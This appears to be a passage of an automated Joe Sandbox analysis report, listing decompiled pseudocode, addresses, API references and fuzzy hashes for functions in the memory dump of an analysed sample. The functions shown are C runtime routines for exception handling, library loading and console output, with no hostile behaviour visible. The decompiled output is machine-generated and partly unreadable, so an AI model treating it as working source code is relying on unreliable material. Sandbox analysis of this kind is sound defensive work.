							E0135BD97(_t115);
							_t109 =  *0x13a0b18; // 0x0
							L34:
							_push(3);
							L12:
							_v20 =  *_t121;
							 *0x13a0b18 = _t109 + 1;
							_v16 =  *(_t121 + 4) | 0x00000100;
							_push( &_v20);
							_push( &_v12);
							_push(_a4);
							E01360803(_t108, 0);
							goto L17;
						}
						_t89 = _t63;
						__eflags = _t89;
						if(_t89 == 0) {
							goto L15;
						}
						_t90 = _t89 - 0x41;
						__eflags = _t90;
						if(_t90 == 0) {
							_t31 = _t109 + 1; // -1
							 *0x13a0b18 = _t31;
							E01360C1E(0, _a4, _t121);
							L5:
							goto L6;
						}
						_t93 = _t90 - 1;
						__eflags = _t93;
						if(_t93 == 0) {
							_t29 = _t109 + 1; // -1
							 *0x13a0b18 = _t29;
							E01360914(__ebx, _t121, _a4, _t121, 1);
							goto L16;
						}
						_t96 = _t93 - 1;
						__eflags = _t96;
						if(_t96 == 0) {
							_t22 = _t109 + 1; // -1
							_v20 = 0;
							 *0x13a0b18 = _t22;
							_v16 = 0;
							E01360109(_a4, E0135F793( &_v12, _t121, 0,  &_v20, 0));
							goto L17;
						}
						__eflags = _t96 == 0xe;
						if(_t96 == 0xe) {
							goto L34;
						}
						goto L39;
					}
					__eflags = _t62;
					if(_t62 != 0) {
						goto L39;
					}
					goto L15;
				}
				_t121 = _a8;
				_t103 = _t61 - 0x1d;
				if(_t103 == 0) {
					L11:
					_push(2);
					goto L12;
				}
				if(_t103 == 1) {
					_t118 =  &_v12;
					_push( &_v20);
					__eflags =  *_t121;
					if( *_t121 == 0) {
						_v20 = "volatile";
						_v16 = 8;
					} else {
						_v20 = "volatile ";
						_v16 = 9;
					}
					E0135BD97(_t118);
					_t109 =  *0x13a0b18; // 0x0
					goto L11;
				}
				E01360109(_a4, _t121);
				goto L5;
			}



























                                                                                              0x0135f545
                                                                                              0x0135f54b
                                                                                              0x0135f554
                                                                                              0x0135f557
                                                                                              0x0135f55d
                                                                                              0x0135f55f
                                                                                              0x0135f5f8
                                                                                              0x0135f600
                                                                                              0x0135f605
                                                                                              0x0135f608
                                                                                              0x00000000
                                                                                              0x0135f608
                                                                                              0x0135f565
                                                                                              0x0135f568
                                                                                              0x0135f5e9
                                                                                              0x0135f5ec
                                                                                              0x0135f5ee
                                                                                              0x0135f60e
                                                                                              0x0135f611
                                                                                              0x0135f617
                                                                                              0x0135f61a
                                                                                              0x0135f61d
                                                                                              0x0135f6de
                                                                                              0x0135f6de
                                                                                              0x0135f6e1
                                                                                              0x0135f786
                                                                                              0x0135f789
                                                                                              0x0135f6f7
                                                                                              0x0135f6fc
                                                                                              0x00000000
                                                                                              0x0135f6fc
                                                                                              0x0135f6e7
                                                                                              0x0135f6e7
                                                                                              0x0135f6ea
                                                                                              0x0135f738
                                                                                              0x0135f73b
                                                                                              0x0135f740
                                                                                              0x0135f743
                                                                                              0x0135f745
                                                                                              0x0135f76e
                                                                                              0x0135f775
                                                                                              0x0135f77c
                                                                                              0x00000000
                                                                                              0x0135f77c
                                                                                              0x0135f74b
                                                                                              0x0135f756
                                                                                              0x0135f75d
                                                                                              0x00000000
                                                                                              0x0135f75d
                                                                                              0x0135f6ed
                                                                                              0x0135f6ed
                                                                                              0x0135f6f0
                                                                                              0x0135f71b
                                                                                              0x0135f71e
                                                                                              0x0135f721
                                                                                              0x0135f726
                                                                                              0x0135f72b
                                                                                              0x0135f730
                                                                                              0x00000000
                                                                                              0x0135f730
                                                                                              0x0135f6f2
                                                                                              0x0135f6f5
                                                                                              0x0135f709
                                                                                              0x0135f70c
                                                                                              0x0135f711
                                                                                              0x0135f581
                                                                                              0x00000000
                                                                                              0x0135f581
                                                                                              0x00000000
                                                                                              0x0135f6f5
                                                                                              0x0135f623
                                                                                              0x0135f626
                                                                                              0x0135f6a6
                                                                                              0x0135f6a9
                                                                                              0x0135f6aa
                                                                                              0x0135f6ac
                                                                                              0x0135f6be
                                                                                              0x0135f6c5
                                                                                              0x0135f6ae
                                                                                              0x0135f6ae
                                                                                              0x0135f6b5
                                                                                              0x0135f6b5
                                                                                              0x0135f6cc
                                                                                              0x0135f6d1
                                                                                              0x0135f6d7
                                                                                              0x0135f6d7
                                                                                              0x0135f5bd
                                                                                              0x0135f5c0
                                                                                              0x0135f5cb
                                                                                              0x0135f5d1
                                                                                              0x0135f5d7
                                                                                              0x0135f5db
                                                                                              0x0135f5dc
                                                                                              0x0135f5df
                                                                                              0x00000000
                                                                                              0x0135f5e4
                                                                                              0x0135f628
                                                                                              0x0135f628
                                                                                              0x0135f62a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0135f62c
                                                                                              0x0135f62c
                                                                                              0x0135f62f
                                                                                              0x0135f691
                                                                                              0x0135f694
                                                                                              0x0135f699
                                                                                              0x0135f580
                                                                                              0x00000000
                                                                                              0x0135f580
                                                                                              0x0135f631
                                                                                              0x0135f631
                                                                                              0x0135f634
                                                                                              0x0135f67b
                                                                                              0x0135f67e
                                                                                              0x0135f683
                                                                                              0x00000000
                                                                                              0x0135f683
                                                                                              0x0135f636
                                                                                              0x0135f636
                                                                                              0x0135f639
                                                                                              0x0135f649
                                                                                              0x0135f64c
                                                                                              0x0135f650
                                                                                              0x0135f65d
                                                                                              0x0135f66b
                                                                                              0x00000000
                                                                                              0x0135f670
                                                                                              0x0135f63b
                                                                                              0x0135f63e
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0135f644
                                                                                              0x0135f5f0
                                                                                              0x0135f5f2
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0135f5f2
                                                                                              0x0135f56a
                                                                                              0x0135f56d
                                                                                              0x0135f570
                                                                                              0x0135f5bb
                                                                                              0x0135f5bb
                                                                                              0x00000000
                                                                                              0x0135f5bb
                                                                                              0x0135f575
                                                                                              0x0135f58a
                                                                                              0x0135f58d
                                                                                              0x0135f58e
                                                                                              0x0135f590
                                                                                              0x0135f5a2
                                                                                              0x0135f5a9
                                                                                              0x0135f592
                                                                                              0x0135f592
                                                                                              0x0135f599
                                                                                              0x0135f599
                                                                                              0x0135f5b0
                                                                                              0x0135f5b5
                                                                                              0x00000000
                                                                                              0x0135f5b5
                                                                                              0x0135f57b
                                                                                              0x00000000

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.263651007.0000000001351000.00000020.00000001.01000000.00000004.sdmp, Offset: 01350000, based on PE: true
                                                                                              • Associated: 00000001.00000002.263645440.0000000001350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263688808.0000000001394000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.000000000139E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.00000000013A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263707204.00000000013A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_1350000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID: operator+shared_ptr$NameName::
                                                                                              • String ID:
                                                                                              • API String ID: 2894330373-0
                                                                                              • Opcode ID: bf4242c76cee064541882804f76b9a1e421c88bbc149e7122b09e316ca5d2591
                                                                                              • Instruction ID: 1009b59f1c33524e7d82b75b8e19da6caac521757ce38bd787e5d9c3ef07bbd8
                                                                                              • Opcode Fuzzy Hash: bf4242c76cee064541882804f76b9a1e421c88bbc149e7122b09e316ca5d2591
                                                                                              • Instruction Fuzzy Hash: 60617C7180010EEFDB98DF68C944DBABFBDFB0471CF14895AE9059A624E732D645CB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 01386114 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 118COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 47%
                                                                                              			E01386114(void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				signed int _v8;
				signed int _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v28;
				signed int _v36;
				void* _v40;
				intOrPtr _v44;
				signed int _v48;
				intOrPtr _v56;
				void _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v80;
				void* __ebx;
				void* __ebp;
				void* _t57;
				void* _t58;
				char _t59;
				intOrPtr* _t64;
				void* _t65;
				intOrPtr* _t70;
				void* _t73;
				signed char* _t76;
				intOrPtr* _t79;
				void* _t81;
				signed int _t85;
				signed int _t86;
				signed char _t91;
				signed int _t94;
				void* _t102;
				void* _t107;
				void* _t113;
				void* _t115;

				_t102 = __esi;
				_t93 = __edx;
				_t81 = __ecx;
				_t79 = _a4;
				if( *_t79 == 0x80000003) {
					return _t57;
				} else {
					_push(__esi);
					_push(__edi);
					_t58 = E0135B16E(_t79, __ecx, __edx, __edi, __esi);
					if( *((intOrPtr*)(_t58 + 8)) != 0) {
						__imp__EncodePointer(0);
						_t102 = _t58;
						if( *((intOrPtr*)(E0135B16E(_t79, __ecx, __edx, 0, _t102) + 8)) != _t102 &&  *_t79 != 0xe0434f4d &&  *_t79 != 0xe0434352) {
							_t70 = E013662D9(__edx, 0, _t102, _t79, _a8, _a12, _a16, _a20, _a28, _a32);
							_t113 = _t113 + 0x1c;
							if(_t70 != 0) {
								L16:
								return _t70;
							}
						}
					}
					_t59 = _a20;
					_v24 = _t59;
					_v20 = 0;
					if( *((intOrPtr*)(_t59 + 0xc)) > 0) {
						E01366189(_t81,  &_v40,  &_v24, _a24, _a16, _t59, _a28);
						_t94 = _v36;
						_t115 = _t113 + 0x18;
						_t70 = _v40;
						_v16 = _t70;
						_v8 = _t94;
						if(_t94 < _v28) {
							_t85 = _t94 * 0x14;
							_v12 = _t85;
							do {
								_t86 = 5;
								_t73 = memcpy( &_v60,  *((intOrPtr*)( *_t70 + 0x10)) + _t85, _t86 << 2);
								_t115 = _t115 + 0xc;
								if(_v60 <= _t73 && _t73 <= _v56) {
									_t76 = _v44 + 0xfffffff0 + (_v48 << 4);
									_t91 = _t76[4];
									if(_t91 == 0 ||  *((char*)(_t91 + 8)) == 0) {
										if(( *_t76 & 0x00000040) == 0) {
											_push(0);
											_push(1);
											E01386094(_t94, _t79, _a8, _a12, _a16, _a20, _t76, 0,  &_v60, _a28, _a32);
											_t94 = _v8;
											_t115 = _t115 + 0x30;
										}
									}
								}
								_t94 = _t94 + 1;
								_t70 = _v16;
								_t85 = _v12 + 0x14;
								_v8 = _t94;
								_v12 = _t85;
							} while (_t94 < _v28);
						}
						goto L16;
					}
					E0135B0BB(_t79, _t81, _t93, 0, _t102);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_v80 = _v64 + 0xc;
					_t64 = E01384040(_v68, _v60);
					_t65 =  *_t64(0, _t102, _t113, _t81, _t79, _t107);
					_pop(_t110);
					_t83 = _v60;
					if(_v60 == 0x100) {
						_t83 = 2;
					}
					return E01384040(_t65, _t83);
				}
			}






































                                                                                              0x01386114
                                                                                              0x01386114
                                                                                              0x01386114
                                                                                              0x0138611b
                                                                                              0x01386124
                                                                                              0x01386243
                                                                                              0x0138612a
                                                                                              0x0138612a
                                                                                              0x0138612b
                                                                                              0x0138612c
                                                                                              0x01386136
                                                                                              0x01386139
                                                                                              0x0138613f
                                                                                              0x01386149
                                                                                              0x0138616e
                                                                                              0x01386173
                                                                                              0x01386178
                                                                                              0x0138623f
                                                                                              0x00000000
                                                                                              0x01386240
                                                                                              0x01386178
                                                                                              0x01386149
                                                                                              0x0138617e
                                                                                              0x01386181
                                                                                              0x01386184
                                                                                              0x0138618a
                                                                                              0x013861a2
                                                                                              0x013861a7
                                                                                              0x013861aa
                                                                                              0x013861ad
                                                                                              0x013861b0
                                                                                              0x013861b3
                                                                                              0x013861b9
                                                                                              0x013861bf
                                                                                              0x013861c2
                                                                                              0x013861c5
                                                                                              0x013861d4
                                                                                              0x013861d5
                                                                                              0x013861d5
                                                                                              0x013861da
                                                                                              0x013861ed
                                                                                              0x013861ef
                                                                                              0x013861f4
                                                                                              0x013861ff
                                                                                              0x01386201
                                                                                              0x01386203
                                                                                              0x0138621f
                                                                                              0x01386224
                                                                                              0x01386227
                                                                                              0x01386227
                                                                                              0x013861ff
                                                                                              0x013861f4
                                                                                              0x0138622d
                                                                                              0x0138622e
                                                                                              0x01386231
                                                                                              0x01386234
                                                                                              0x01386237
                                                                                              0x0138623a
                                                                                              0x013861c5
                                                                                              0x00000000
                                                                                              0x013861b9
                                                                                              0x01386244
                                                                                              0x01386249
                                                                                              0x0138624a
                                                                                              0x0138624b
                                                                                              0x0138624c
                                                                                              0x0138624d
                                                                                              0x0138624e
                                                                                              0x0138624f
                                                                                              0x0138625e
                                                                                              0x0138626e
                                                                                              0x01386275
                                                                                              0x0138627b
                                                                                              0x0138627c
                                                                                              0x01386288
                                                                                              0x0138628a
                                                                                              0x0138628a
                                                                                              0x01386299
                                                                                              0x01386299

                                                                                              APIs
                                                                                              • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,0138601A,?,?,00000000,00000000,00000000,?), ref: 01386139
                                                                                              • CatchIt.LIBVCRUNTIME ref: 0138621F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.263651007.0000000001351000.00000020.00000001.01000000.00000004.sdmp, Offset: 01350000, based on PE: true
                                                                                              • Associated: 00000001.00000002.263645440.0000000001350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263688808.0000000001394000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.000000000139E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.00000000013A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263707204.00000000013A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_1350000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID: CatchEncodePointer
                                                                                              • String ID: MOC$RCC
                                                                                              • API String ID: 1435073870-2084237596
                                                                                              • Opcode ID: 4a204615d75213f025a988ec47019f5e7269742fa6813dc8838b1835f65055a0
                                                                                              • Instruction ID: 00404616b9ae8436f77fb26bd3e16d445ddfbbe1e9191782930cc9d559af0c4d
                                                                                              • Opcode Fuzzy Hash: 4a204615d75213f025a988ec47019f5e7269742fa6813dc8838b1835f65055a0
                                                                                              • Instruction Fuzzy Hash: 064181B1900209EFDF16EF98DD82AEEBBB5FF48308F148199FA0567226D3359950DB50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 013824CC Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E013824CC(WCHAR* _a4) {
				struct HINSTANCE__* _t4;

				_t4 = LoadLibraryExW(_a4, 0, 0x800);
				if(_t4 != 0) {
					return _t4;
				} else {
					if(GetLastError() != 0x57 || E01368845(_a4, L"api-ms-", 7) == 0) {
						return 0;
					}
					return LoadLibraryExW(_a4, 0, 0);
				}
			}




                                                                                              0x013824d9
                                                                                              0x013824e1
                                                                                              0x01382516
                                                                                              0x013824e3
                                                                                              0x013824ec
                                                                                              0x00000000
                                                                                              0x01382513
                                                                                              0x01382512
                                                                                              0x01382512

                                                                                              APIs
                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,01382678,00000000,?,013A0B48,?,?,?,0138249F,00000004,InitializeCriticalSectionEx,01395C44,01395C4C), ref: 013824D9
                                                                                              • GetLastError.KERNEL32(?,01382678,00000000,?,013A0B48,?,?,?,0138249F,00000004,InitializeCriticalSectionEx,01395C44,01395C4C,00000000,?,013621D2), ref: 013824E3
                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 0138250B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.263651007.0000000001351000.00000020.00000001.01000000.00000004.sdmp, Offset: 01350000, based on PE: true
                                                                                              • Associated: 00000001.00000002.263645440.0000000001350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263688808.0000000001394000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.000000000139E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.00000000013A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263707204.00000000013A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_1350000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID: LibraryLoad$ErrorLast
                                                                                              • String ID: api-ms-
                                                                                              • API String ID: 3177248105-2084034818
                                                                                              • Opcode ID: 75f965290aec50f0119d646beece921c47af0dc5a84ec30568e32a61ad46237a
                                                                                              • Instruction ID: 1b0250a9ec5217ad3919aa290b2fbfdb9fc0fae3149c4e79d09a9680b40b2a8d
                                                                                              • Opcode Fuzzy Hash: 75f965290aec50f0119d646beece921c47af0dc5a84ec30568e32a61ad46237a
                                                                                              • Instruction Fuzzy Hash: C9E01A31380309F6EF212BA5FC56B6D7E98AB00B58F244020FA0DA80D5D762E6208A65
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 01384A61 Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 77%
                                                                                              			E01384A61(intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16, intOrPtr _a20) {
				char _v16;
				signed int _v20;
				char _v28;
				signed int _v35;
				signed char _v36;
				void _v44;
				long _v48;
				signed char* _v52;
				char _v53;
				long _v60;
				intOrPtr _v64;
				struct _OVERLAPPED* _v68;
				signed int _v72;
				struct _OVERLAPPED* _v76;
				signed int _v80;
				signed int _v84;
				intOrPtr _v88;
				void _v92;
				long _v96;
				signed char* _v100;
				void* _v104;
				intOrPtr _v108;
				char _v112;
				int _v116;
				struct _OVERLAPPED* _v120;
				struct _OVERLAPPED* _v124;
				struct _OVERLAPPED* _v128;
				struct _OVERLAPPED* _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t177;
				signed int _t178;
				signed int _t180;
				signed char* _t190;
				void* _t200;
				signed char* _t201;
				long _t205;
				intOrPtr _t210;
				void _t212;
				signed char* _t217;
				void* _t224;
				signed int _t227;
				struct _OVERLAPPED* _t229;
				void* _t238;
				signed char* _t240;
				signed char* _t243;
				long _t246;
				intOrPtr _t247;
				signed char* _t248;
				void* _t258;
				intOrPtr _t265;
				void* _t266;
				struct _OVERLAPPED* _t267;
				signed int _t268;
				intOrPtr* _t279;
				signed int _t281;
				signed int _t285;
				signed char _t286;
				long _t287;
				signed int _t291;
				signed char* _t292;
				struct _OVERLAPPED* _t296;
				void* _t299;
				signed int _t300;
				void* _t302;
				struct _OVERLAPPED* _t303;
				signed char* _t306;
				intOrPtr* _t307;
				void* _t308;
				signed int _t309;
				long _t310;
				signed int _t311;
				signed int _t312;
				signed int _t313;
				void* _t314;
				void* _t315;
				void* _t316;

				_push(0xffffffff);
				_push(0x139366e);
				_push( *[fs:0x0]);
				_t315 = _t314 - 0x74;
				_t177 =  *0x139e210; // 0x1911783b
				_t178 = _t177 ^ _t313;
				_v20 = _t178;
				_push(_t178);
				 *[fs:0x0] =  &_v16;
				_t180 = _a8;
				_t306 = _a12;
				_t265 = _a20;
				_t268 = (_t180 & 0x0000003f) * 0x38;
				_t291 = _t180 >> 6;
				_v100 = _t306;
				_v64 = _t265;
				_v84 = _t291;
				_v72 = _t268;
				_v104 =  *((intOrPtr*)( *((intOrPtr*)(0x13a0da0 + _t291 * 4)) + _t268 + 0x18));
				_v88 = _a16 + _t306;
				_v116 = GetConsoleOutputCP();
				if( *((char*)(_t265 + 0x14)) == 0) {
					E01371420(_t265, _t291);
				}
				_t307 = _a4;
				_v108 =  *((intOrPtr*)( *((intOrPtr*)(_t265 + 0xc)) + 8));
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t190 = _v100;
				_t292 = _t190;
				_v52 = _t292;
				if(_t190 < _v88) {
					_t300 = _v72;
					_t267 = 0;
					_v76 = 0;
					do {
						_v53 =  *_t292;
						_v68 = _t267;
						_v48 = 1;
						_t273 =  *(0x13a0da0 + _v84 * 4);
						_v80 = _t273;
						if(_v108 != 0xfde9) {
							if(( *(_t300 + _t273 + 0x2d) & 0x00000004) == 0) {
								_t273 =  *_t292 & 0x000000ff;
								if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v64 + 0xc)))) + ( *_t292 & 0x000000ff) * 2)) >= _t267) {
									_push(_v64);
									_push(1);
									_push(_t292);
									goto L29;
								} else {
									_t217 =  &(_t292[1]);
									_v60 = _t217;
									if(_t217 >= _v88) {
										 *((char*)(_t300 + _v80 + 0x2e)) =  *_t292;
										 *( *(0x13a0da0 + _v84 * 4) + _t300 + 0x2d) =  *( *(0x13a0da0 + _v84 * 4) + _t300 + 0x2d) | 0x00000004;
										 *((intOrPtr*)(_t307 + 4)) = _v76 + 1;
									} else {
										_t224 = E0138869E(_t273, _t292,  &_v68, _t292, 2, _v64);
										_t316 = _t315 + 0x10;
										if(_t224 != 0xffffffff) {
											_t201 = _v60;
											goto L31;
										}
									}
								}
							} else {
								_push(_v64);
								_v36 =  *(_t300 + _t273 + 0x2e) & 0x000000fb;
								_t227 =  *_t292;
								_v35 = _t227;
								 *(_t300 + _t273 + 0x2d) = _t227;
								_push(2);
								_push( &_v36);
								L29:
								_push( &_v68);
								_t200 = E0138869E(_t273, _t292);
								_t316 = _t315 + 0x10;
								if(_t200 != 0xffffffff) {
									_t201 = _v52;
									goto L31;
								}
							}
						} else {
							_t229 = _t267;
							_t279 = _t273 + 0x2e + _t300;
							while( *_t279 != _t267) {
								_t229 =  &(_t229->Internal);
								_t279 = _t279 + 1;
								if(_t229 < 5) {
									continue;
								}
								break;
							}
							_t302 = _v88 - _t292;
							_v48 = _t229;
							if(_t229 == 0) {
								_t73 = ( *_t292 & 0x000000ff) + 0x139e980; // 0x0
								_t281 =  *_t73 + 1;
								_v80 = _t281;
								if(_t281 > _t302) {
									if(_t302 <= 0) {
										goto L44;
									} else {
										_t309 = _v72;
										do {
											 *((char*)( *(0x13a0da0 + _v84 * 4) + _t309 + _t267 + 0x2e)) =  *((intOrPtr*)(_t267 + _t292));
											_t267 =  &(_t267->Internal);
										} while (_t267 < _t302);
										goto L43;
									}
									L52:
								} else {
									_v132 = _t267;
									_v128 = _t267;
									_v60 = _t292;
									_v48 = (_t281 == 4) + 1;
									_t238 = E01389E23( &_v132,  &_v68,  &_v60, (_t281 == 4) + 1,  &_v132, _v64);
									_t316 = _t315 + 0x14;
									if(_t238 != 0xffffffff) {
										_t240 =  &(_v52[_v80]);
										_t300 = _v72;
										goto L21;
									}
								}
							} else {
								_t285 = _v72;
								_t243 = _v80 + 0x2e + _t285;
								_v80 = _t243;
								_t246 =  *((char*)(( *_t243 & 0x000000ff) + 0x139e980)) + 1;
								_v60 = _t246;
								_t247 = _t246 - _v48;
								_v76 = _t247;
								if(_t247 > _t302) {
									if(_t302 > 0) {
										_t248 = _v52;
										_t310 = _v48;
										do {
											_t286 =  *((intOrPtr*)(_t267 + _t248));
											_t292 =  *(0x13a0da0 + _v84 * 4) + _t285 + _t267;
											_t267 =  &(_t267->Internal);
											_t292[_t310 + 0x2e] = _t286;
											_t285 = _v72;
										} while (_t267 < _t302);
										L43:
										_t307 = _a4;
									}
									L44:
									 *((intOrPtr*)(_t307 + 4)) =  *((intOrPtr*)(_t307 + 4)) + _t302;
								} else {
									_t287 = _v48;
									_t303 = _t267;
									_t311 = _v80;
									do {
										 *((char*)(_t313 + _t303 - 0x18)) =  *_t311;
										_t303 =  &(_t303->Internal);
										_t311 = _t311 + 1;
									} while (_t303 < _t287);
									_t304 = _v76;
									if(_v76 > 0) {
										E013547B0( &_v28 + _t287, _t292, _t304);
										_t287 = _v48;
										_t315 = _t315 + 0xc;
									}
									_t300 = _v72;
									_t296 = _t267;
									_t312 = _v84;
									do {
										 *( *((intOrPtr*)(0x13a0da0 + _t312 * 4)) + _t300 + _t296 + 0x2e) = _t267;
										_t296 =  &(_t296->Internal);
									} while (_t296 < _t287);
									_t307 = _a4;
									_v112 =  &_v28;
									_v124 = _t267;
									_v120 = _t267;
									_v48 = (_v60 == 4) + 1;
									_t258 = E01389E23( &_v124,  &_v68,  &_v112, (_v60 == 4) + 1,  &_v124, _v64);
									_t316 = _t315 + 0x14;
									if(_t258 != 0xffffffff) {
										_t240 =  &(_v52[_v76]);
										L21:
										_t201 = _t240 - 1;
										L31:
										_v52 = _t201 + 1;
										_t205 = E0136F1C0(_v116, _t267,  &_v68, _v48,  &_v44, 5, _t267, _t267);
										_t315 = _t316 + 0x20;
										_v60 = _t205;
										if(_t205 != 0) {
											if(WriteFile(_v104,  &_v44, _t205,  &_v96, _t267) == 0) {
												L50:
												 *_t307 = GetLastError();
											} else {
												_t292 = _v52;
												_t210 =  *((intOrPtr*)(_t307 + 8)) + _t292 - _v100;
												_v76 = _t210;
												 *((intOrPtr*)(_t307 + 4)) = _t210;
												if(_v96 >= _v60) {
													if(_v53 != 0xa) {
														goto L38;
													} else {
														_t212 = 0xd;
														_v92 = _t212;
														if(WriteFile(_v104,  &_v92, 1,  &_v96, _t267) == 0) {
															goto L50;
														} else {
															if(_v96 >= 1) {
																 *((intOrPtr*)(_t307 + 8)) =  *((intOrPtr*)(_t307 + 8)) + 1;
																 *((intOrPtr*)(_t307 + 4)) =  *((intOrPtr*)(_t307 + 4)) + 1;
																_t292 = _v52;
																_v76 =  *((intOrPtr*)(_t307 + 4));
																goto L38;
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
						goto L51;
						L38:
					} while (_t292 < _v88);
				}
				L51:
				 *[fs:0x0] = _v16;
				_pop(_t299);
				_pop(_t308);
				_pop(_t266);
				return E01353E0D(_t307, _t266, _v20 ^ _t313, _t292, _t299, _t308);
				goto L52;
			}

















































































                                                                                              0x01384a66
                                                                                              0x01384a68
                                                                                              0x01384a73
                                                                                              0x01384a74
                                                                                              0x01384a77
                                                                                              0x01384a7c
                                                                                              0x01384a7e
                                                                                              0x01384a84
                                                                                              0x01384a88
                                                                                              0x01384a8e
                                                                                              0x01384a93
                                                                                              0x01384a99
                                                                                              0x01384a9c
                                                                                              0x01384a9f
                                                                                              0x01384aa2
                                                                                              0x01384aa5
                                                                                              0x01384aa8
                                                                                              0x01384ab2
                                                                                              0x01384ab9
                                                                                              0x01384ac1
                                                                                              0x01384ace
                                                                                              0x01384ad1
                                                                                              0x01384ad5
                                                                                              0x01384ad5
                                                                                              0x01384add
                                                                                              0x01384ae5
                                                                                              0x01384aea
                                                                                              0x01384aeb
                                                                                              0x01384aec
                                                                                              0x01384aed
                                                                                              0x01384af0
                                                                                              0x01384af2
                                                                                              0x01384af8
                                                                                              0x01384afe
                                                                                              0x01384b01
                                                                                              0x01384b03
                                                                                              0x01384b06
                                                                                              0x01384b0f
                                                                                              0x01384b15
                                                                                              0x01384b18
                                                                                              0x01384b1f
                                                                                              0x01384b26
                                                                                              0x01384b29
                                                                                              0x01384c6a
                                                                                              0x01384c8d
                                                                                              0x01384c99
                                                                                              0x01384cca
                                                                                              0x01384ccd
                                                                                              0x01384ccf
                                                                                              0x00000000
                                                                                              0x01384c9b
                                                                                              0x01384c9b
                                                                                              0x01384c9e
                                                                                              0x01384ca4
                                                                                              0x01384dee
                                                                                              0x01384dfc
                                                                                              0x01384e05
                                                                                              0x01384caa
                                                                                              0x01384cb4
                                                                                              0x01384cb9
                                                                                              0x01384cbf
                                                                                              0x01384cc5
                                                                                              0x00000000
                                                                                              0x01384cc5
                                                                                              0x01384cbf
                                                                                              0x01384ca4
                                                                                              0x01384c6c
                                                                                              0x01384c73
                                                                                              0x01384c76
                                                                                              0x01384c79
                                                                                              0x01384c7b
                                                                                              0x01384c7e
                                                                                              0x01384c85
                                                                                              0x01384c87
                                                                                              0x01384cd0
                                                                                              0x01384cd3
                                                                                              0x01384cd4
                                                                                              0x01384cd9
                                                                                              0x01384cdf
                                                                                              0x01384ce5
                                                                                              0x00000000
                                                                                              0x01384ce5
                                                                                              0x01384cdf
                                                                                              0x01384b2f
                                                                                              0x01384b32
                                                                                              0x01384b34
                                                                                              0x01384b36
                                                                                              0x01384b3a
                                                                                              0x01384b3b
                                                                                              0x01384b3f
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01384b3f
                                                                                              0x01384b44
                                                                                              0x01384b46
                                                                                              0x01384b4b
                                                                                              0x01384c0b
                                                                                              0x01384c12
                                                                                              0x01384c13
                                                                                              0x01384c18
                                                                                              0x01384dca
                                                                                              0x00000000
                                                                                              0x01384dcc
                                                                                              0x01384dcc
                                                                                              0x01384dcf
                                                                                              0x01384dde
                                                                                              0x01384de2
                                                                                              0x01384de3
                                                                                              0x00000000
                                                                                              0x01384de7
                                                                                              0x00000000
                                                                                              0x01384c1e
                                                                                              0x01384c23
